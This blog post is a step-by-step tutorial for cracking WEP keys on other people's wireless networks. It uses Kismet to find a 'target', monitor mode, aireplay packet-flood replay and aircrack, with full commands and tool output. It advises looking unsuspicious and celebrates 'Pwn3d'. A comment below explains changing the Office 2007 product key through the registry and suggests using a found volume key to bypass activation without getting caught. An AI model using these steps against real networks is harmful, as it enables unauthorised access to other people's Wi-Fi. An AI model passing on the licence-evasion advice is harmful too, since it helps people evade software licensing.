:heart:More Cracking WEP GUIDES and Information From
Intro:
Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:
Kismet (any working version)
>= Aireplay 2.2 beta
>= Aircrack 2.1
As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).
Getting Started:
Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);
CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
source=orinoco,eth1,kismet
#source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone
^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).
Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can
be found on the Kismet website under Documentation.
Changed kismet.conf:
CODE
# Sources are defined as:
# source=sourcetype,interface,name[,initialchannel]
# Source types and required drivers are listed in the README
# The initial channel is optional, if hopping is not enabled it can be used
# to set the channel the interface listens on.
# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE
#source=orinoco,eth1,kismet
source=wlanng,wlan0,Prism
#source=kismet_drone,192.168.2.252:3501,kismet_drone
Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.
Going in for the kill:
So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.
First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:
CODE
If you use madwifi, you may have to place the card in
pure 802.11b mode first:
iwpriv ath0 mode 2
If you use wlan-ng, run
./wlanng.sh start wlan0 [comes with AirePlay2.2]
Otherwise run:
iwconfig ath0 mode Monitor channel
ifconfig ath0 up
Read the AirePlay2.2 readme for more info.
Start by opening up another terminal window and cd into your aircrack directory and launch airodump:
Code:
#./airodump
[version crap]
usage: ./airodump [mac filter]
e.g
./airodump wlan0 linksys
The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):
CODE
capture packets unless interface #1 is specified.
source options:
-i : capture packet on-the-fly (default)
-r file : extract packet from this pcap file
filter options:
-b bssid : MAC address, Access Point
-d dmac : MAC address, Destination
-s smac : MAC address, Source
-m len : minimum packet length, default: 40
-n len : maximum packet length, default: 512
-u type : fc, type - default: 2 = data
-v subt : fc, subtype - default: 0 = normal
-t tods : fc, To DS bit - default: any
-f fromds : fc, From DS bit - default: any
-w iswep : fc, WEP bit - default: 1
-y : don't ask questions, assume yes
replay options:
-x nbpps : number of packets per second
-a bssid : set Access Point MAC address
-c dmac : set Destination MAC address
-h smac : set Source MAC address
-o fc0 : set frame control[0] (hex)
-p fc1 : set frame control[1] (hex)
-k : turn chopchop attack on
e.g
./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0
Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):
CODE
aircrack 2.1 - © 2004 Christophe Devine
usage: ./aircrack [options] ...
-d : debug - specify beginning of the key
-f : bruteforce fudge factor (default: 2)
-m : MAC address to filter usable packets
-n : WEP key length: 64 / 128 / 256 / 512
-p : SMP support: # of processes to start
-q : Quiet mode (less print more speed)
e.g
./aircrack -n 128 linksys.cap
what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.
KEY FOUND: [ Pwn3d ]
Happy WarDriving.
(Please reply with any errors in my tutorial
POSTED BY PYPIYU AT 10:44 AM
1 COMMENTS:
moku said...
how-to-change-office-2007-product-key
You may need to alter or change Microsoft Office 2007 (aka 2007 Microsoft Office System programs and suites) product license key or volume license key (VLK) which also known as serial number or CD key.
You can modify or change product key for 2007 Microsoft Office programs or suites by first uninstall or remove Microsoft Office and then reinstalling the business productivity suite. However, you can follow the following steps in order to reset and change the Microsoft Office 2007 product serial key without the need to uninstall or reinstall 2007 Office system suites.
Note: The following steps involve modification of registry key values, which may corrupt your Windows if done incorrectly. Backup registry first before performing the workaround.
1. Close all Microsoft Office programs.
2. Click on Start button, then click on Run.
3. Type “regedit” (without quotes) in the Run text box, and click OK or press Enter.
4. Locate and then click the following subkey:
HKEY_LOCAL_MACHINE \Software\Microsoft\Office\12.0\Registration
Inside, you will find another subkey that resembles the following subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\12.0\Registration\{30120000-0011-0000-0000-0000000FF1CE}
5. Optional: Backup this registry branch by exporting the Registration subkey to a file, just in case the new product key does not work and you have to restore back the old product key. To export the registry, right click on the Registration subkey and click on Export, and follow the on-screen prompt to enter a file name for the registry file and choose a location to store it.
6. Under the Registration subkey, there may be several Globally Unique Identifiers (GUID) subkey that contain a combination of alphanumeric characters. Each GUID is specific to a program that is installed on your computer.
If you find additional subkeys that reference Microsoft 12.0 registration, then click and open each GUID subkey to view and identify the Office product version by the ProductName registry entry in the right pane. For example:
ProductName=Microsoft Office Professional Plus 2007
7. After you find the GUID subkey that contains your Office product or program which you want to remove the existing product license key or registration details, delete the following registry entries by right clicking on the registry entry in the GUID subkey, click Delete, and then click Yes:
• DigitalProductID
• ProductID
8. Exit Registry Editor.
9. Run or open an Office application program, such as Microsoft Word or Excel or Outlook. Office 2007 will prompt you to enter a new 25-character product key.
10. Type in the valid and genuine product key, and then click OK.
11. Then when prompted to choose your preferred type of Microsoft Office 2007 installation, press on “Install Now”.
12. Microsoft Office 2007 will be updated with new product CD key or volume license key, and ready for activation (if it’s a non-VLK serial) or use.
Note: If you’re having problem with your new Office 2007 product key, simply double click on the backup registry .reg file created at the optional step above to restore the registry settings of the Registration subkey so that the original value can be imported back to the registry.
You may need to reset to change Office 2007 product key with the above steps if you don’t want to uninstall or reinstall Microsoft Office 2007 again in many scenarios, such as you have just bought a retail version of Office 2007, or receive Office 2007 as a gift, or win MS Office 2007 as a prize, or just get your MSN product key for Office 2007, or having problem with activation process online or via phone, or unable to step-up or convert evaluation copy of Office 2007 to full-use version, or having problem with Office Genuine Advantage (OG) validation.
On the other hand, if you manage to find a valid and genuine volume license key or VLK, you can change the product key of Microsoft Office 2007 with the VLK serial in order to bypass the Office 2007 activation process (as Office 2007 still using WPA 1.0 where corporate users need not to activate), without the need of crack or hack for Office 2007, for full use for unlimited period as long as you’re not caught by OGA
